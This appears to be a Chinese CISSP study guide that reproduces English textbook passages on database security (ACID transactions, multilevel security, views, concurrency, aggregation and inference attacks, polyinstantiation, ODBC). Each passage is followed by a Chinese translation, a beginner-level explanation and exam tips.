考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
学习单元 52 / PDF P1375

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

BEGIN TRANSACTION UPDATE accounts SET balance = balance + 250 WHERE account_number = 1001; UPDATE accounts SET balance = balance – 250 WHERE account_number = 2002 END TRANSACTION Imagine a case where these two statements were not executed as part of a transaction but were instead executed separately. If the database failed during the moment between completion of the first transaction and completion of the second transaction, $250 would have been added to account 1001, but there would be no corresponding deduction from account 2002. The $250 would have appeared out of thin air.

Flipping the order of the two statements wouldn't help—this would cause $250 to disappear into thin air if interrupted. This simple example underscores the importance of transaction-oriented processing. When a transaction successfully finishes, it is said to be committed to the database and cannot be undone. Transaction committing may be explicit, using SQL's COMMIT command, or it can be implicit if the end of the transaction is successfully reached. If a transaction must be aborted, it can be rolled back explicitly using the ROLLBACK command or implicitly if there is a hardware or software failure.

When a transaction is rolled back, the database restores itself to the condition it was in before the transaction began. Relational database transactions have four required characteristics: atomicity, consistency, isolation, and durability. Together, these attributes are known as the ACID model, which is a critical concept in the development of database management systems. Let's take a brief look at each of these requirements: Atomicity Database transactions must be atomic—that is, they must be an “all-or-nothing” affair. If any part of the transaction fails, the entire transaction must be rolled back as if it never occurred.

Consistency All transactions must begin operating in an environment that is consistent with all of the database's rules (for example, all records have a unique primary key). When the transaction is complete, the database must again be consistent with the rules, regardless of whether those rules were violated during the processing of the transaction itself. No other transaction BEGIN TRANSACTION UPDATE accounts SET balance = balance + 250 WHERE account_number = 1001; UPDATE accounts SET balance = balance – 250 WHERE account_number = 2002 END TRANSACTION

中文直译 / 整理

假设这两种语句未作为事务的一部分执行,而是分别执行。 如果数据库在第一 条语句完成与第二条语句完成之间的时刻发生故障,那么 250 美元将被添加到 账户 1001,但账户 2002 却没有相应的扣款。 这 250 美元将凭空出现。 交换两 条语句的顺序也无法解决问题——如果在此过程中断,250 美元将凭空消失。 这 个简单的例子突显了事务处理的重要性。 当事务成功完成时,它被称为已提交到数据库,且无法撤销。 事务提交可以是 显式的,使用 SQL 的 COMMIT 命令; 也可以是隐式的,当事务成功到达末尾时 自动提交。 如果事务必须中止,可以通过 ROLLBACK 命令显式回滚,或在发生硬 件或软件故障时隐式回滚。 当事务被回滚时,数据库会恢复到事务开始前的状 态。 关系型数据库事务具有四个必需的特性:原子性、一致性、隔离性和持久性。 这些属性合称为 ACID模型,这是数据库管理系统开发中的关键概念。 让我们 简要查看每一项要求: 原子性 数据库事务必须是原子的,即必须是“全有或全无”的操作。 如果事务 的任何部分失败,则整个事务必须回滚,仿佛从未发生过。

一致性 所有事务都必须在符合数据库所有规则的环境中开始操作(例如,所有记 录都有唯一的主键)。 当事务完成时,无论在事务处理过程中是否违反了这些规 则,数据库都必须再次符合这些规则。 其他事务

小白解释

场景先行:你是公司的安全负责人,正在读第 1375 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
学习单元 53 / PDF P1376

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

should ever be able to use any inconsistent data that might be generated during the execution of another transaction. Isolation The isolation principle requires that transactions operate separately from each other. If a database receives two SQL transactions that modify the same data, one transaction must be completed in its entirety before the other transaction is allowed to modify the same data. This prevents one transaction from working with invalid data generated as an intermediate step by another transaction. Durability Database transactions must be durable. That is, once they are committed to the database, they must be preserved.

Databases ensure durability through the use of backup mechanisms, such as transaction logs. In the following sections, we'll discuss a variety of specific security issues of concern to database developers and administrators. Security for Multilevel Databases As you learned in Chapter 1, many organizations use data classification schemes to enforce access control restrictions based on the security labels assigned to data objects and individual users. When mandated by an organization's security policy, this classification concept must also be extended to the organization's databases. Multilevel security databases contain information at a number of different classification levels.

They must verify the labels assigned to users and, in response to user requests, provide only information that's appropriate. However, this concept becomes somewhat more complicated when considering security for a database. When multilevel security is required, it's essential that administrators and developers strive to keep data with different security requirements separate. Mixing data with different classification levels and/or need-to-know requirements, known as database contamination, is a significant security challenge. Often, administrators will deploy a trusted front end to add multilevel security to a legacy or insecure DBMS.

中文直译 / 整理

永远不应使用在另一个事务执行过程中可能生成的任何不一致数据。 隔离隔离原则要求事务彼此独立运行。 如果数据库接收到两个修改相同数据的 SQL事务,则必须在另一个事务允许修改相同数据之前,完成其中一个事务的全 部操作。 这可以防止一个事务使用另一个事务作为中间步骤生成的无效数据。 持久性数据库事务必须具有持久性。 也就是说,一旦事务被提交到数据库,就 必须被保留。 数据库通过使用备份机制(如事务日志)来确保持久性。 在以下章节中,我们将讨论数据库开发人员和管理员关注的各种具体安全问题。 多级数据库的安全性 正如您在第1章中学到的,许多组织使用数据分类方案,根据分配给数据对 象和单个用户的安全标签来强制执行访问控制限制。 当组织的安全策略要求 时,此分类概念也必须扩展到组织的数据库中。 多级安全数据库包含多个不同分类级别的信息。 它们必须验证分配给用户的 标签,并根据用户请求仅提供适当的信息。 然而,在考虑数据库安全性时, 这一概念会变得稍微复杂一些。 当需要多级安全时,管理员和开发人员必须努力将具有不同安全要求的数据分 开。 混合具有不同分类级别和/或知悉需求的数据,称为数据库污染,是一项 重大的安全挑战。

通常,管理员会部署一个可信的前端,为传统的或不安全的 数据库管理系统添加多级安全功能。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

分类由数据所有者决定,保护由保管者实施。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 54 / PDF P1377

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Restricting Access with Views Another way to implement multilevel security in a database is through the use of database views. Views are simply SQL statements that present data to the user as if the views were tables themselves. Views may be used to collate data from multiple tables, aggregate individual records, or restrict a user's access to a limited subset of database attributes and/or records. Views are stored in the database as SQL commands rather than as tables of data. This dramatically reduces the space requirements of the database and allows views to violate the rules of normalization that apply to tables.

However, retrieving data from a complex view can take significantly longer than retrieving it from a table because the DBMS may need to perform calculations to determine the value of certain attributes for each record. Because views are so flexible, many database administrators use them as a security tool—allowing users to interact only with limited views rather than with the raw tables of data underlying them. Concurrency Concurrency, or edit control, is a preventive security mechanism that endeavors to make certain that the information stored in the database is always correct or at least has its integrity and availability protected.

This feature can be employed on a single-level or multilevel database. Databases that fail to implement concurrency correctly may suffer from the following issues: Lost Updates Occur when two different processes make updates to a database, unaware of each other's activity. For example, imagine an inventory database in a warehouse with different receiving stations. The warehouse might currently have 10 copies of the CISSP Study Guide in stock. If two different receiving stations each receive a copy of the CISSP Study Guide at the same time, they both might check the current inventory level, find that it

中文直译 / 整理

通过视图限制访问 在数据库中实现多级安全的另一种方法是使用数据库视图。 视图仅仅是将 数据呈现给用户的SQL语句,仿佛视图本身就是表一样。 视图可用于整合 来自多个表的数据、聚合单条记录,或限制用户对数据库属性和/或记录的 有限子集的访问。 视图以 SQL 命令的形式存储在数据库中,而不是作为数据表。 这大大减少 了数据库的空间需求,并允许视图违反适用于表的规范化规则。 然而,从 复杂视图中检索数据所需的时间可能远长于从表中检索,因为数据库管理 系统可能需要执行计算,以确定每条记录中某些属性的值。 由于视图具有极大的灵活性,许多数据库管理员将其用作安全工具——允 许用户仅与有限的视图交互,而非直接访问其底层的原始数据表。 并发 并发,或编辑控制,是一种预防性安全机制,旨在确保数据库中存储的信 息始终正确,或至少其完整性和可用性得到保护。 此功能可在单层或多层 次数据库中使用。 未能正确实现并发的数据库可能会遇到以下问题: 丢失的更新发生在两个不同的进程在不知晓彼此操作的情况下对数据库进行更新 时。 例如,想象一个仓库中的库存数据库,该仓库有多个收货站。 目前仓库可能 有10本CISSP学习指南在库。

如果两个不同的收货站同时各收到一本CISSP学习 指南,它们都可能检查当前库存量,发现为10,将其加1并更新表格为11,而实 际值应为12。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
学习单元 55 / PDF P1378

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

is 10, increment it by 1, and update the table to read 11, when the actual value should be 12. Dirty Reads Occur when a process reads a record from a transaction that did not successfully commit. Returning to our warehouse example, if a receiving station begins to write new inventory records to the database but then crashes in the middle of the update, it may leave partially incorrect information in the database if the transaction is not completely rolled back. Concurrency uses a “lock” feature to allow one user to make changes but deny other users access to views or make changes to data elements at the same time.

Then, after the changes have been made, an “unlock” feature restores the ability of other users to access the data they need. In some instances, administrators will use concurrency with auditing mechanisms to track document and/or field changes. When this recorded data is reviewed, concurrency becomes a detection control. Aggregation SQL provides a number of functions that combine records from one or more tables to produce potentially useful information. This process is called aggregation. Aggregation is not without its security vulnerabilities.

Aggregation attacks are used to collect numerous low-level security items or low-value items and combine them to create something of a higher security level or value. In other words, malicious actors may be able to collect multiple facts about or from a system and then use these facts to launch an attack. These functions, although extremely useful, also pose a risk to the security of information in a database. For example, suppose a low-level military records clerk is responsible for updating records of personnel and equipment as they are transferred from base to base. As part of their duties, this clerk may be granted the database permissions necessary to query and update personnel tables.

The military might not consider an individual transfer request (in other words, Sergeant Jones is being moved from Base X to Base Y) to be classified information. The records clerk has access to that information because they need it to process Sergeant Jones's transfer. However, with access to aggregate functions, the records clerk might be able to count the number of troops assigned to each military base around the world. These force levels are often closely guarded military secrets, but the low-ranking records clerk could

中文直译 / 整理

是10,将其加1并更新表格为11,而实际值应为12。 脏读 发生在某个进程读取了一个未成功提交的事务中的记录时。 以我们的仓库 示例为例,如果收货站开始向数据库写入新的库存记录,但在更新过程中崩溃, 且事务未完全回滚,则可能导致数据库中存在部分错误的信息。 并发性使用“锁定”功能,允许一个用户进行更改,同时阻止其他用户同时访 问视图或修改数据元素。 在更改完成后,通过“解锁”功能恢复其他用户访问 所需数据的能力。 在某些情况下,管理员会将并发性与审计机制结合使用,以 跟踪文档和/或字段的更改。 当审查这些记录数据时,并发性便成为一种检测 控制。 聚合 SQL 提供了多种函数,可将一个或多个表中的记录合并,以生成潜在有用的 信息。 此过程称为 聚合。 聚合并非没有安全漏洞。 聚合攻击用于收集大量低级别安全项或低价值项,并将它们组合起来,形成具 有更高安全级别或价值的内容。 换句话说,恶意攻击者可能收集有关系统或来 自系统的多个事实,然后利用这些事实发起攻击。 这些函数虽然非常有用,但也对数据库中信息的安全构成风险。 例如,假设一 名低级别的军事档案管理员负责在人员和设备从一个基地转移到另一个基地时 更新记录。

作为其职责的一部分,该管理员可能会被授予查询和更新人员表所 需的数据库权限。 军方可能不会将个人调动请求(即琼斯军士从X基地调往Y基地)视为机密信息。 档案管理员有权访问这些信息,因为他们需要这些信息来处理琼斯军士的调动。 然而,通过访问聚合函数,档案管理员可能能够统计出全球每个军事基地的驻 军人数。 这些兵力数据通常是严密保密的军事机密,但这位低阶档案管理员却 可以

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 56 / PDF P1379

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

deduce them by using aggregate functions across a large number of unclassified records. For this reason, it's especially important for database security administrators to strictly control access to aggregate functions and adequately assess the potential information they may reveal to unauthorized individuals. Combining defense-in-depth, need-to-know, and least privilege principles help prevent access aggregation attacks. Inference The database security issues posed by inference attacks are similar to those posed by the threat of data aggregation.

Inference attacks involve combining several pieces of nonsensitive information to gain access to information that should be classified at a higher level. However, inference makes use of the human mind's deductive capacity rather than the raw mathematical ability of modern database platforms. A commonly cited example of an inference attack is that of the accounting clerk at a large corporation who is allowed to retrieve the total amount the company spends on salaries for use in a top-level report but is not allowed to access the salaries of individual employees.

The accounting clerk often has to prepare those reports with effective dates in the past and so is allowed to access the total salary amounts for any day in the past year. Say, for example, that this clerk must also know the hiring and termination dates of various employees and has access to this information. This opens the door for an inference attack. If an employee was the only person hired on a specific date, the accounting clerk can now retrieve the total salary amount on that date and the day before and deduce the salary of that particular employee— sensitive information that the user would not be permitted to access directly.

As with aggregation, the best defense against inference attacks is to maintain constant vigilance over the permissions granted to individual users. Furthermore, intentional blurring of data may be used to prevent the inference of sensitive information. For example, if the accounting clerk were able to retrieve only salary information rounded to the nearest million, they would probably not be able to gain any useful information about individual employees. Finally, you can use database partitioning (discussed in the next section) to help subvert these attacks. Other Security Mechanisms

中文直译 / 整理

通过大量非机密记录的聚合函数推断出这些数据。 因此,数据库安全管理员必须严格控制对聚合函数的访问,并充分评估这些函 数可能向未经授权人员泄露的信息。 结合深度防御、最小必要知晓和最小权限 原则,有助于防止访问聚合攻击。 推理 推理攻击所带来的数据库安全问题与数据聚合威胁所引发的问题相似。 推理攻 击涉及将多个非敏感信息片段组合起来,以获取应被归类为更高级别的信息。 然而,推理利用的是人类思维的演绎能力,而非现代数据库平台的原始数学计 算能力。 一个常被引用的推理攻击示例是:一家大型企业的会计文员被允许获取公司用 于高级报告的薪资总额,但无权访问单个员工的薪资。 该会计文员通常需要编 制过去有效日期的报告,因此被允许访问过去一年中任何一天的薪资总额。 例 如,该文员还必须了解不同员工的入职和离职日期,并有权访问这些信息。 这 就为推理攻击打开了大门。 如果某位员工是在特定日期唯一入职的,那么会计 文员现在可以获取该日期及前一天的薪资总额,并推断出该员工的薪资——这 是一条用户本无权直接访问的敏感信息。 与聚合类似,防范推断攻击的最佳方法是持续监控授予每个用户的权限。

此外, 可以有意对数据进行模糊处理,以防止敏感信息被推断出来。 例如,如果会计 职员只能获取四舍五入到最近百万的薪资信息,他们可能无法获得有关任何单 个员工的有用信息。 最后,您可以使用数据库分区(下一节将讨论)来帮助规 避这些攻击。 其他安全机制

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 57 / PDF P1380

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Administrators can deploy several other security mechanisms when using a DBMS. These features are relatively easy to implement and are common in the industry. The mechanisms related to semantic integrity, for instance, are common security features of a DBMS. Semantic integrity ensures that user actions don't violate any structural rules. It also checks that all stored data types are within valid domain ranges, ensures that only logical values exist, and confirms that the system complies with any and all uniqueness constraints. Administrators may employ time and date stamps to maintain data integrity and availability. Time and date stamps often appear in distributed database systems.

When a timestamp is placed on all change transactions and those changes are distributed or replicated to the other database members, all changes are applied to all members, but they are implemented in correct chronological order. Another common security feature of a DBMS is that objects can be controlled granularly within the database; this can also improve security control. Content-dependent access control is an example of granular object control and is based on the contents or payload of the object being accessed. Because decisions must be made on an object-by-object basis, content-dependent control increases processing overhead. Another form of granular control is cell suppression.

Cell suppression is the concept of hiding individual database fields or cells or imposing more security restrictions on them. Context-dependent access control is often discussed alongside contentdependent access control because of the similarity of the terms. Contextdependent access control evaluates the big picture to make access control decisions. The key factor in context-dependent access control is how each object or packet or field relates to the overall activity or communication. Any single element may look innocuous by itself, but in a larger context that element may be revealed to be benign or malign.

Administrators might employ database partitioning to subvert aggregation and inference vulnerabilities. Database partitioning is the process of splitting a single database into multiple parts, each with a unique and distinct security level or type of content. Polyinstantiation, in the context of databases, occurs when two or more rows in the same relational database table appear to have identical primary key elements but contain different data for use at differing classification levels. Polyinstantiation is often used as a defense against some types of inference

中文直译 / 整理

管理员在使用DBMS时可以部署其他几种安全机制。 这些功能相对容易实现, 并且在行业中很常见。 例如,与语义完整性相关的机制是DBMS的常见安全功 能。 语义完整性确保用户操作不会违反任何结构规则,同时检查所有存储的数 据类型是否在有效域范围内,确保仅存在逻辑值,并确认系统符合所有唯一性 约束。 管理员可以使用时间戳和日期戳来维护数据的完整性和可用性。 时间戳和日 期戳通常出现在分布式数据库系统中。 当对所有更改事务都加上时间戳,并 将这些更改分发或复制到其他数据库成员时,所有更改都会应用到所有成员 上,但会按照正确的先后顺序执行。 DBMS 的另一个常见安全功能是可以在数据库内对对象进行细粒度控制; 这也 可以增强安全控制。 基于内容的访问控制是细粒度对象控制的一个示例,它基 于所访问对象的内容或有效载荷。 由于必须逐个对象做出决策,基于内容的控 制会增加处理开销。 另一种细粒度控制形式是 单元抑制。 单元抑制是指隐藏单 个数据库字段或单元,或对其施加更严格的安全限制的概念。 基于上下文的访问控制常与基于内容的访问控制一起讨论,因为这两个术语相 似。 基于上下文的访问控制通过评估整体情况来做出访问控制决策。

基于上下 文的访问控制的关键因素是每个对象、数据包或字段如何与整体活动或通信相 关联。 单个元素本身可能看似无害,但在更大的上下文中,该元素可能被揭示 为无害或有害。 管理员可能会使用数据库分区来规避聚合和推断漏洞。 数据库分区是将一个数 据库拆分为多个部分的过程,每个部分具有独特且不同的安全级别或内容类型。 多实例化,在数据库的上下文中,指的是在同一个关系型数据库表中,两条或 多条记录的主键元素看似相同,但包含用于不同分类级别的不同数据。 多实例 化通常用作防御某些类型推断攻击的手段

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 58 / PDF P1381

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

attacks, but it introduces additional storage costs to store copies of data designed for different clearance levels. Consider a database table containing the location of various naval ships on patrol. Normally, this database contains the exact position of each ship stored at the secret classification level. However, one particular ship, the USS UpToNoGood, is on an undercover mission to a top-secret location. Military commanders do not want anyone to know that the ship deviated from its normal patrol.

If the database administrators simply change the classification of the UpToNoGood's location to top secret, a user with a secret clearance would know that something unusual was going on when they couldn't query the location of the ship. However, if polyinstantiation is used, two records could be inserted into the table. The first one, classified at the top-secret level, would reflect the true location of the ship and be available only to users with the appropriate top-secret security clearance. The second record, classified at the secret level, would indicate that the ship was on routine patrol and would be returned to users with a secret clearance.

Finally, administrators can insert false or misleading data into a DBMS in order to redirect or thwart information confidentiality attacks. This is a concept known as noise and perturbation. You must be extremely careful when using this technique to ensure that noise inserted into the database does not affect business operations. Open Database Connectivity Open Database Connectivity (ODBC) is a database feature that allows applications to communicate with different types of databases without having to be directly programmed for interaction with each type.

ODBC acts as a proxy between applications and backend database drivers, giving application programmers greater freedom in creating solutions without having to worry about the backend database system. Figure 20.11 illustrates the relationship between ODBC and a backend database system.

中文直译 / 整理

攻击,但它会引入额外的存储成本,以存储为不同密级设计的数据副本。 考虑一个包含巡逻中各种军舰位置的数据库表。 通常,该数据库以秘密保密级 别存储每艘船的确切位置。 然而,有一艘特定的军舰 USSUpToNoGood 正在执 行一项前往高度机密地点的潜伏任务。 军事指挥官不希望任何人知道这艘船偏 离了其常规巡逻路线。 如果数据库管理员只是将 UpToNoGood 的位置保密级 别改为高度机密,那么拥有秘密级别权限的用户在无法查询该船位置时,就会 意识到发生了异常情况。 然而,如果使用多实例化技术,则可以在表中插入两 条记录。 第一条记录为高度机密级别,反映船舶的真实位置,仅限拥有相应高 度机密安全权限的用户访问; 第二条记录为秘密级别,表明该船仍在常规巡逻, 并返回给拥有秘密级别权限的用户。 最后,管理员可以在数据库管理系统中插入虚假或误导性数据,以转移或 阻止信息保密攻击。 这是一种称为 噪声与扰动 的概念。 在使用此技术时, 必须极为谨慎,以确保插入数据库的噪声不会影响业务运营。 开放数据库互连 开放数据库互连(ODBC)是一种数据库功能,它允许应用程序在无需为每种 数据库类型直接编程的情况下与不同类型的数据库进行通信。

ODBC 充当应用 程序与后端数据库驱动程序之间的代理,使应用程序开发人员在创建解决方案 时拥有更大的自由度,而无需担心后端数据库系统。 图 20.11展示了 ODBC 与 后端数据库系统之间的关系。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

